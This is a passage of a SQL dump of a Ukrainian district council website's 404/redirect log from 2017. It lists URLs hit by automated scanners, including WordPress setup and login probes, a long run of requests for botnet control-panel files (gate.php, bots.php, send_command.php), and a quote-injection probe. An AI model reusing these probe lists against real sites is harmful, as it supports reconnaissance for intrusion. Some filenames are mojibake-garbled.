00:00:00',301),(30487,'http://www.malyn-rayrada.gov.ua/index.php/1467-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo',NULL,'http://lp.kyivstar.net/error.html?msisdn=380672250153&error-code=404&request-url1=http://www.malyn-rayrada.gov.ua/index.php/1467-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo','',2,0,'2017-05-23 12:09:55','0000-00-00 00:00:00',301),(30488,'http://malyn-rayrada.gov.ua/attachments/article/2/ð”ðµðºð»ð°ñ€ð°ñ†ñ–ñ  ð ð¸ñ‡ð¸ð¿ð¾ñ€ðµð½ðºð¾ ð·ð° 2015 ñ€ñ–ðº.pdf',NULL,'','',1,0,'2017-05-24 07:23:43','0000-00-00 00:00:00',301),(30489,'http://malyn-rayrada.gov.ua/attachments/article/2/ð”ðµðºð»ð°ñ€ð°ñ†ñ–ñ  ð›ðµð²ðºð¾ð²ðµñ†ñœ.pdf',NULL,'','',1,0,'2017-05-24 07:30:31','0000-00-00 00:00:00',301),(30490,'http://malyn-rayrada.gov.ua/wp/wp-admin/setup-config.php',NULL,'','',2,0,'2017-05-27 03:13:34','0000-00-00 00:00:00',301),(30491,'http://malyn-rayrada.gov.ua/old/wp-admin/setup-config.php',NULL,'','',2,0,'2017-05-27 03:13:34','0000-00-00 00:00:00',301),(30492,'http://malyn-rayrada.gov.ua/test/wp-admin/setup-config.php',NULL,'','',2,0,'2017-05-27 03:13:35','0000-00-00 00:00:00',301),(30493,'http://www.malyn-rayrada.gov.ua/test/wp-admin/setup-config.php',NULL,'','',1,0,'2017-05-27 03:13:55','0000-00-00 00:00:00',301),(30494,'http://www.malyn-rayrada.gov.ua/old/wp-admin/setup-config.php',NULL,'','',1,0,'2017-05-27 03:13:56','0000-00-00 00:00:00',301),(30495,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/pochesni-gromadyani-rajonu&sa=u&ved=0ahukewifrzduzz_uahufczokhaedays4pbawcbowaq&usg=afqjcnenodzjvby2fugv7r-aqnlmp__q-a',NULL,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/pochesni-gromadyani-rajonu&sa=U&ved=0ahUKEwifrZDUzZ_UAhUFCZoKHaeDAys4PBAWCBowAQ&usg=AFQjCNEnODZjvBY2FUGV7R-AQnLmp__q-A','',1,0,'2017-06-03 02:24:27','0000-00-00 00:00:00',301),(30496,'http://malyn-rayrada.gov.ua/wordpress/wp-login.php',NULL,'http://linkedin.jorrin.com/wordpress/wp-login.php','',1,0,'2017-06-04 20:34:01','0000-00-00 00:00:00',301),(30497,'http://malyn-rayrada.gov.ua/wp/wp-login.php',NULL,'http://macclesfield.opendi.co.uk/wp/wp-login.php','',1,0,'2017-06-05 05:11:49','0000-00-00 00:00:00',301),(30498,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-07-12-2016-roku\'a=0',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-07-12-2016-roku\'A=0','',1,0,'2017-06-05 10:08:06','0000-00-00 00:00:00',301),(30499,'http://malyn-rayrada.gov.ua/blog/wp-login.php',NULL,'http://maartenvandenberg.net/blog/wp-login.php','',1,0,'2017-06-05 15:00:04','0000-00-00 00:00:00',301),(30500,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1746-pro-deleguvannya-predstavnikiv-do-skladu-gospitalnoji-radi-korostenskoji-gospitalnoji-bazi',NULL,'','',1,0,'2017-06-05 19:31:08','0000-00-00 00:00:00',301),(30501,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/theme/style.css',NULL,'','',2,0,'2017-06-05 23:09:48','0000-00-00 00:00:00',301),(30502,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/config.php',NULL,'','',6,0,'2017-06-05 23:09:54','0000-00-00 00:00:00',301),(30503,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/style_dark.css',NULL,'','',2,0,'2017-06-05 23:09:56','0000-00-00 00:00:00',301),(30504,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin.php',NULL,'','',6,0,'2017-06-05 23:10:04','0000-00-00 00:00:00',301),(30505,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/config.php',NULL,'','',1,0,'2017-06-05 23:10:09','0000-00-00 00:00:00',301),(30506,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/css/',NULL,'','',4,0,'2017-06-05 23:10:10','0000-00-00 00:00:00',301),(30507,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/css/content.css',NULL,'','',1,0,'2017-06-05 23:10:12','0000-00-00 00:00:00',301),(30508,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/css/reset.css',NULL,'','',1,0,'2017-06-05 23:10:24','0000-00-00 00:00:00',301),(30509,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/',NULL,'','',1,0,'2017-06-05 23:10:34','0000-00-00 00:00:00',301),(30510,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/gear.png',NULL,'','',1,0,'2017-06-05 23:10:46','0000-00-00 00:00:00',301),(30511,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/header.png',NULL,'','',1,0,'2017-06-05 23:10:48','0000-00-00 00:00:00',301),(30512,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/user_female.png',NULL,'','',1,0,'2017-06-05 23:10:51','0000-00-00 00:00:00',301),(30513,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/arrow_left_ovr.png',NULL,'','',1,0,'2017-06-05 23:10:52','0000-00-00 00:00:00',301),(30514,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/bck_attention.png',NULL,'','',1,0,'2017-06-05 23:10:55','0000-00-00 00:00:00',301),(30515,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/login.php',NULL,'','',14,0,'2017-06-05 23:11:14','0000-00-00 00:00:00',301),(30516,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/home.php',NULL,'','',1,0,'2017-06-05 23:11:26','0000-00-00 00:00:00',301),(30517,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/index.html',NULL,'','',2,0,'2017-06-05 23:11:28','0000-00-00 00:00:00',301),(30518,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/graphics/banner.png',NULL,'','',1,0,'2017-06-05 23:11:30','0000-00-00 00:00:00',301),(30519,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/login.js',NULL,'','',1,0,'2017-06-05 23:11:31','0000-00-00 00:00:00',301),(30520,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/project.php',NULL,'','',1,0,'2017-06-05 23:11:47','0000-00-00 00:00:00',301),(30521,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/lend.php',NULL,'','',2,0,'2017-06-05 23:11:52','0000-00-00 00:00:00',301),(30522,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/lending/index.php',NULL,'','',5,0,'2017-06-05 23:11:53','0000-00-00 00:00:00',301),(30523,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/asdfdsfasfdasfsd.php',NULL,'','',1,0,'2017-06-05 23:11:57','0000-00-00 00:00:00',301),(30524,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/anal.php',NULL,'','',1,0,'2017-06-05 23:12:02','0000-00-00 00:00:00',301),(30525,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/biling.php',NULL,'','',1,0,'2017-06-05 23:12:07','0000-00-00 00:00:00',301),(30526,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/logout.php',NULL,'','',3,0,'2017-06-05 23:12:12','0000-00-00 00:00:00',301),(30527,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/change.php',NULL,'','',1,0,'2017-06-05 23:12:17','0000-00-00 00:00:00',301),(30528,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/statss.php',NULL,'','',1,0,'2017-06-05 23:12:18','0000-00-00 00:00:00',301),(30529,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/btn_submit.png',NULL,'','',3,0,'2017-06-05 23:12:27','0000-00-00 00:00:00',301),(30530,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/support.php',NULL,'','',2,0,'2017-06-05 23:12:55','0000-00-00 00:00:00',301),(30531,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/lending/img/arab.png',NULL,'','',3,0,'2017-06-05 23:13:04','0000-00-00 00:00:00',301),(30532,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/icn_edit.png',NULL,'','',3,0,'2017-06-05 23:13:11','0000-00-00 00:00:00',301),(30533,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/js/hideshow.js',NULL,'','',2,0,'2017-06-05 23:13:19','0000-00-00 00:00:00',301),(30534,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/lending/img/fbi.png',NULL,'','',1,0,'2017-06-05 23:13:58','0000-00-00 00:00:00',301),(30535,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/icn_search.png',NULL,'','',1,0,'2017-06-05 23:14:06','0000-00-00 00:00:00',301),(30536,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/breadcrumb_divider.png',NULL,'','',1,0,'2017-06-05 23:14:08','0000-00-00 00:00:00',301),(30537,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/resources/images/b.png',NULL,'','',1,0,'2017-06-05 23:14:11','0000-00-00 00:00:00',301),(30538,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/cron.php',NULL,'','',1,0,'2017-06-05 23:14:46','0000-00-00 00:00:00',301),(30539,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tasks.php',NULL,'','',4,0,'2017-06-05 23:14:57','0000-00-00 00:00:00',301),(30540,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/stats.php',NULL,'','',1,0,'2017-06-05 23:14:58','0000-00-00 00:00:00',301),(30541,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/run.php',NULL,'','',1,0,'2017-06-05 23:15:00','0000-00-00 00:00:00',301),(30542,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/asdfddsas.php',NULL,'','',1,0,'2017-06-05 23:15:06','0000-00-00 00:00:00',301),(30543,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/view/img/favicon.png',NULL,'','',1,0,'2017-06-05 23:15:14','0000-00-00 00:00:00',301),(30544,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tmp',NULL,'','',1,0,'2017-06-05 23:15:22','0000-00-00 00:00:00',301),(30545,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tmp/',NULL,'','',1,0,'2017-06-05 23:15:26','0000-00-00 00:00:00',301),(30546,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/vendor',NULL,'','',1,0,'2017-06-05 23:15:30','0000-00-00 00:00:00',301),(30547,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/vendor/',NULL,'','',1,0,'2017-06-05 23:15:44','0000-00-00 00:00:00',301),(30548,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/lib',NULL,'','',1,0,'2017-06-05 23:15:47','0000-00-00 00:00:00',301),(30549,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/lib/',NULL,'','',1,0,'2017-06-05 23:15:50','0000-00-00 00:00:00',301),(30550,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/app',NULL,'','',1,0,'2017-06-05 23:15:55','0000-00-00 00:00:00',301),(30551,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/app/',NULL,'','',1,0,'2017-06-05 23:15:58','0000-00-00 00:00:00',301),(30552,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tmp/logs',NULL,'','',1,0,'2017-06-05 23:16:02','0000-00-00 00:00:00',301),(30553,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/tmp/logs/',NULL,'','',1,0,'2017-06-05 23:16:03','0000-00-00 00:00:00',301),(30554,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/uploads',NULL,'','',1,0,'2017-06-05 23:16:06','0000-00-00 00:00:00',301),(30555,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/uploads/',NULL,'','',1,0,'2017-06-05 23:16:12','0000-00-00 00:00:00',301),(30556,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/public',NULL,'','',1,0,'2017-06-05 23:16:14','0000-00-00 00:00:00',301),(30557,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/public/',NULL,'','',1,0,'2017-06-05 23:16:19','0000-00-00 00:00:00',301),(30558,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/public/css/app.css',NULL,'','',1,0,'2017-06-05 23:16:21','0000-00-00 00:00:00',301),(30559,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/api.php',NULL,'','',1,0,'2017-06-05 23:19:29','0000-00-00 00:00:00',301),(30560,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/data/login.css',NULL,'','',1,0,'2017-06-05 23:19:36','0000-00-00 00:00:00',301),(30561,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/asfdfa.php',NULL,'','',1,0,'2017-06-05 23:19:54','0000-00-00 00:00:00',301),(30562,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/login.php',NULL,'','',1,0,'2017-06-05 23:19:58','0000-00-00 00:00:00',301),(30563,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/chart.php',NULL,'','',1,0,'2017-06-05 23:20:09','0000-00-00 00:00:00',301),(30564,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/activecmd.php',NULL,'','',1,0,'2017-06-05 23:20:16','0000-00-00 00:00:00',301),(30565,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/function.php',NULL,'','',1,0,'2017-06-05 23:20:29','0000-00-00 00:00:00',301),(30566,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/main.css',NULL,'','',1,0,'2017-06-05 23:20:33','0000-00-00 00:00:00',301),(30567,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/bar.png',NULL,'','',1,0,'2017-06-05 23:20:38','0000-00-00 00:00:00',301),(30568,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/cp.php',NULL,'','',2,0,'2017-06-05 23:20:52','0000-00-00 00:00:00',301),(30569,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/theme/images/back-all.jpg',NULL,'','',1,0,'2017-06-05 23:20:57','0000-00-00 00:00:00',301),(30570,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/theme/header.html',NULL,'','',2,0,'2017-06-05 23:21:15','0000-00-00 00:00:00',301),(30571,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/asdfdsafdsfsadf.php',NULL,'','',1,0,'2017-06-05 23:21:24','0000-00-00 00:00:00',301),(30572,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/security_number.php',NULL,'','',2,0,'2017-06-05 23:21:39','0000-00-00 00:00:00',301),(30573,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/connect.php',NULL,'','',2,0,'2017-06-05 23:22:07','0000-00-00 00:00:00',301),(30574,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/inc/',NULL,'','',2,0,'2017-06-05 23:22:38','0000-00-00 00:00:00',301),(30575,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/ico/',NULL,'','',2,0,'2017-06-05 23:23:07','0000-00-00 00:00:00',301),(30576,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/png/',NULL,'','',2,0,'2017-06-05 23:23:29','0000-00-00 00:00:00',301),(30577,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/preloaders/',NULL,'','',2,0,'2017-06-05 23:23:34','0000-00-00 00:00:00',301),(30578,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/back.css',NULL,'','',1,0,'2017-06-05 23:23:42','0000-00-00 00:00:00',301),(30579,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/favicon.png',NULL,'','',1,0,'2017-06-05 23:24:19','0000-00-00 00:00:00',301),(30580,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/logo.png',NULL,'','',5,0,'2017-06-05 23:24:21','0000-00-00 00:00:00',301),(30581,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/management.php',NULL,'','',2,0,'2017-06-05 23:24:26','0000-00-00 00:00:00',301),(30582,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/css/vectormap.css',NULL,'','',2,0,'2017-06-05 23:24:30','0000-00-00 00:00:00',301),(30583,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/js/manag.js',NULL,'','',2,0,'2017-06-05 23:24:37','0000-00-00 00:00:00',301),(30584,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/js/tasks.js',NULL,'','',2,0,'2017-06-05 23:24:41','0000-00-00 00:00:00',301),(30585,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/',NULL,'','',4,0,'2017-06-05 23:24:54','0000-00-00 00:00:00',301),(30586,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/statistics.php',NULL,'','',3,0,'2017-06-05 23:25:02','0000-00-00 00:00:00',301),(30587,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/icon1.png',NULL,'','',1,0,'2017-06-05 23:25:31','0000-00-00 00:00:00',301),(30588,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/icon3.png',NULL,'','',1,0,'2017-06-05 23:25:37','0000-00-00 00:00:00',301),(30589,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/header.jpg',NULL,'','',1,0,'2017-06-05 23:25:44','0000-00-00 00:00:00',301),(30590,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/main.php',NULL,'','',3,0,'2017-06-05 23:27:10','0000-00-00 00:00:00',301),(30591,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/submit.php',NULL,'','',1,0,'2017-06-05 23:27:14','0000-00-00 00:00:00',301),(30592,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/style.css',NULL,'','',1,0,'2017-06-05 23:27:28','0000-00-00 00:00:00',301),(30593,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/design/images/favicon.ico',NULL,'','',1,0,'2017-06-05 23:27:31','0000-00-00 00:00:00',301),(30594,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/assets/img/favicon.ico',NULL,'','',1,0,'2017-06-05 23:27:48','0000-00-00 00:00:00',301),(30595,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/order.php',NULL,'','',1,0,'2017-06-05 23:27:59','0000-00-00 00:00:00',301),(30596,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/captcha.php',NULL,'','',1,0,'2017-06-05 23:28:03','0000-00-00 00:00:00',301),(30597,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/gdx/gdx.php',NULL,'','',1,0,'2017-06-05 23:28:07','0000-00-00 00:00:00',301),(30598,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/gdx/itnernal.php',NULL,'','',1,0,'2017-06-05 23:28:09','0000-00-00 00:00:00',301),(30599,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/flags/ag.png',NULL,'','',1,0,'2017-06-05 23:28:14','0000-00-00 00:00:00',301),(30600,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/bot_info.php',NULL,'','',1,0,'2017-06-05 23:28:41','0000-00-00 00:00:00',301),(30601,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/hexdecode.php',NULL,'','',1,0,'2017-06-05 23:28:45','0000-00-00 00:00:00',301),(30602,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/stats.php',NULL,'','',1,0,'2017-06-05 23:28:48','0000-00-00 00:00:00',301),(30603,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/delete.png',NULL,'','',1,0,'2017-06-05 23:28:50','0000-00-00 00:00:00',301),(30604,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/info.png',NULL,'','',1,0,'2017-06-05 23:28:54','0000-00-00 00:00:00',301),(30605,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/delete_command.php',NULL,'','',1,0,'2017-06-05 23:29:04','0000-00-00 00:00:00',301),(30606,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/send_command.php',NULL,'','',1,0,'2017-06-05 23:29:17','0000-00-00 00:00:00',301),(30607,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/theme/images/back-all.png',NULL,'','',1,0,'2017-06-05 23:29:30','0000-00-00 00:00:00',301),(30608,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/themes/bootstrap.css',NULL,'','',1,0,'2017-06-05 23:29:50','0000-00-00 00:00:00',301),(30609,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/phpinfo.php',NULL,'','',1,0,'2017-06-05 23:29:55','0000-00-00 00:00:00',301),(30610,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/fre.php',NULL,'','',1,0,'2017-06-05 23:31:07','0000-00-00 00:00:00',301),(30611,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/adsfdsafas.php',NULL,'','',1,0,'2017-06-05 23:31:12','0000-00-00 00:00:00',301),(30612,'http://www.malyn-rayrada.gov.ua/index.php/img/back/hawk-clip-art-hawk03.gif',NULL,'','',6,0,'2017-06-05 23:31:52','0000-00-00 00:00:00',301),(30613,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/css',NULL,'','',3,0,'2017-06-05 23:32:07','0000-00-00 00:00:00',301),(30614,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/files',NULL,'','',2,0,'2017-06-05 23:32:12','0000-00-00 00:00:00',301),(30615,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/back',NULL,'','',1,0,'2017-06-05 23:32:14','0000-00-00 00:00:00',301),(30616,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/flags',NULL,'','',2,0,'2017-06-05 23:32:16','0000-00-00 00:00:00',301),(30617,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/softs',NULL,'','',2,0,'2017-06-05 23:32:18','0000-00-00 00:00:00',301),(30618,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/back/hawk-clip-art-hawk03.gif',NULL,'','',2,0,'2017-06-05 23:32:24','0000-00-00 00:00:00',301),(30619,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/ img/back',NULL,'','',1,0,'2017-06-05 23:33:20','0000-00-00 00:00:00',301),(30620,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/login/index.php',NULL,'','',2,0,'2017-06-05 23:34:12','0000-00-00 00:00:00',301),(30621,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/',NULL,'','',1,0,'2017-06-05 23:34:29','0000-00-00 00:00:00',301),(30622,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/js/main.js',NULL,'','',1,0,'2017-06-05 23:34:40','0000-00-00 00:00:00',301),(30623,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/asfdasfasdfasdf.php',NULL,'','',1,0,'2017-06-05 23:35:03','0000-00-00 00:00:00',301),(30624,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/configuration.php',NULL,'','',2,0,'2017-06-05 23:35:07','0000-00-00 00:00:00',301),(30625,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/page.php',NULL,'','',1,0,'2017-06-05 23:35:11','0000-00-00 00:00:00',301),(30626,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/inc_botlist.php',NULL,'','',1,0,'2017-06-05 23:35:24','0000-00-00 00:00:00',301),(30627,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/inc_commands.php',NULL,'','',1,0,'2017-06-05 23:35:26','0000-00-00 00:00:00',301),(30628,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/tpl_commands-php',NULL,'','',1,0,'2017-06-05 23:35:37','0000-00-00 00:00:00',301),(30629,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/include/tpl_main.php',NULL,'','',1,0,'2017-06-05 23:35:39','0000-00-00 00:00:00',301),(30630,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/securimage/backgrounds',NULL,'','',1,0,'2017-06-05 23:35:41','0000-00-00 00:00:00',301),(30631,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/styles/main.css',NULL,'','',1,0,'2017-06-05 23:35:59','0000-00-00 00:00:00',301),(30632,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/styles/reset.css',NULL,'','',1,0,'2017-06-05 23:36:02','0000-00-00 00:00:00',301),(30633,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/images/favicon.ico',NULL,'','',1,0,'2017-06-05 23:36:15','0000-00-00 00:00:00',301),(30634,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/gate.php?request=true',NULL,'','',1,0,'2017-06-05 23:36:22','0000-00-00 00:00:00',301),(30635,'http://www.malyn-rayrada.gov.ua/index.php/pages/bots.php',NULL,'','',1,0,'2017-06-05 23:36:32','0000-00-00 00:00:00',301),(30636,'http://www.malyn-rayrada.gov.ua/index.php/pages/edituser.php',NULL,'','',1,0,'2017-06-05 23:36:47','0000-00-00 00:00:00',301),(30637,'http://www.malyn-rayrada.gov.ua/index.php/pages/main.php',NULL,'','',1,0,'2017-06-05 23:36:50','0000-00-00 00:00:00',301),(30638,'http://www.malyn-rayrada.gov.ua/index.php/pages/tasks.php',NULL,'','',1,0,'2017-06-05 23:36:54','0000-00-00 00:00:00',301),(30639,'http://www.malyn-rayrada.gov.ua/index.php/pages/users.php',NULL,'','',1,0,'2017-06-05 23:36:59','0000-00-00 00:00:00',301),(30640,'http://www.malyn-rayrada.gov.ua/index.php/pages/logs.php',NULL,'','',1,0,'2017-06-05 23:37:02','0000-00-00 00:00:00',301),(30641,'http://www.malyn-rayrada.gov.ua/index.php/pages/account.php',NULL,'','',1,0,'2017-06-05 23:37:06','0000-00-00 00:00:00',301),(30642,'http://www.malyn-rayrada.gov.ua/index.php/pages/settings.php',NULL,'','',1,0,'2017-06-05 23:37:30','0000-00-00 00:00:00',301),(30643,'http://www.malyn-rayrada.gov.ua/index.php/pages/details.php',NULL,'','',1,0,'2017-06-05 23:37:40','0000-00-00 00:00:00',301),(30644,'http://www.malyn-rayrada.gov.ua/index.php/pages/logout.php',NULL,'','',1,0,'2017-06-05 23:37:45','0000-00-00 00:00:00',301),(30645,'http://www.malyn-rayrada.gov.ua/index.php/pages/help.php',NULL,'','',1,0,'2017-06-05 23:37:47','0000-00-00 00:00:00',301),(30646,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/ufr.php',NULL,'','',1,0,'2017-06-05 23:38:04','0000-00-00 00:00:00',301),(30647,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/android/admin.php',NULL,'','',1,0,'2017-06-05 23:39:09','0000-00-00 00:00:00',301),(30648,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img',NULL,'','',3,0,'2017-06-05 23:40:00','0000-00-00 00:00:00',301),(30649,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/img/banners',NULL,'','',2,0,'2017-06-05 23:40:04','0000-00-00 00:00:00',301),(30650,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/afdsafsdaf.php',NULL,'','',1,0,'2017-06-05 23:40:42','0000-00-00 00:00:00',301),(30651,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/style_light.css',NULL,'','',1,0,'2017-06-05 23:41:03','0000-00-00 